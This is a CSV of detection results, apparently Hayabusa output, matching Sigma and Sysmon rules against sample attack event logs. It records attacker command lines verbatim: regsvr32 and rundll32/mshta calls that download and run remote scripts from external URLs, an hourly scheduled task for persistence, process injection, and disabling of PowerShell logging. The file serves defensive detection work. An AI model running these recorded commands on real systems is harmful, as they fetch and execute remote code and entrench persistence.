365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.661 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.708 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:17.786 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:18.833 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:18.833 +00:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,rules/sigma/image_load/image_load_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:50:36.858 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:50:36.889 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:51:14.254 +00:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:51:14.254 +00:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-18 17:51:14.254 +00:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx +2019-05-19 17:32:00.482 +00:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-19 17:32:00.482 +00:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx +2019-05-19 18:05:07.719 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-19 18:05:33.454 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx +2019-05-21 00:35:07.308 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.308 +00:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.463 +00:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.474 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.518 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:07.870 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:08.279 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:08.728 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:08.728 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:10.161 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 00:35:12.705 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.286 +00:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:57.867 +00:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_sysmon/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.389 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.769 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.769 +00:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation_sysmon/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.769 +00:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:32:59.809 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:33:00.140 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-21 15:33:01.141 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx +2019-05-22 04:02:11.307 +00:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-22 04:02:11.307 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 